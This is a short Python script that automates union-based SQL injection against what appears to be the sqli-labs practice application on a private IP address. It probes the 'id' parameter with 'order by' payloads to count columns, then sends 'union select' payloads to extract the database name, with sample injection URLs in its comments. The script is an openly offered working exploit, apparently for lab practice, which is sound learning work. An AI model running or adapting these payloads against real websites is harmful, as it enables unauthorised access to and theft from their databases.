import requests
import string

'''
payload = "?id=1' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,1"
'''
url = "http://192.168.31.203/sqli-labs-master1/Less-2/"
special_char = "' "
char_set = string.printable.strip()


def get_column_num(url):
    for i in range(1, 1000):
        payload = f"?id=1 and 1=2 order by {i}"
        full_url = url + payload
        response = requests.get(full_url)
        print(full_url)
        res = response.text
        if "Unknown column" in res:
            break
    return i-1


def get_databaseName(url, column):
    payload = f"?id=1 and 1=2 union select "
    for i in range(1, column + 1):
        payload += f"{i}"
        if (i < column):
            payload += ","
    ful_url = url + payload
    print(ful_url)
    res = requests.get(ful_url).text
    arr = []
    for i in range(1, column+1):
        if (str(i) in res):
            arr.append(i)

    # 将数组中的的也就是页面中显示出来的行数使用database()填充(这里先只将第一个数字填充为database())
    payload = f"?id=1 and 1=2 union select "
    for i in range(1, column + 1):
        payload += "database()"
        if (i < column):
            payload += ","

    ful_url = url + payload
    print(ful_url)
    res = requests.get(ful_url).text
    print(res)

column_num = get_column_num(url)
print(f"[+] The length of column: {column_num}")

get_databaseName(url, column_num)
'''
http://192.168.31.203/sqli-labs-master1/Less-2/?id=1 and 1=2 union select 1,database(),version()
'''
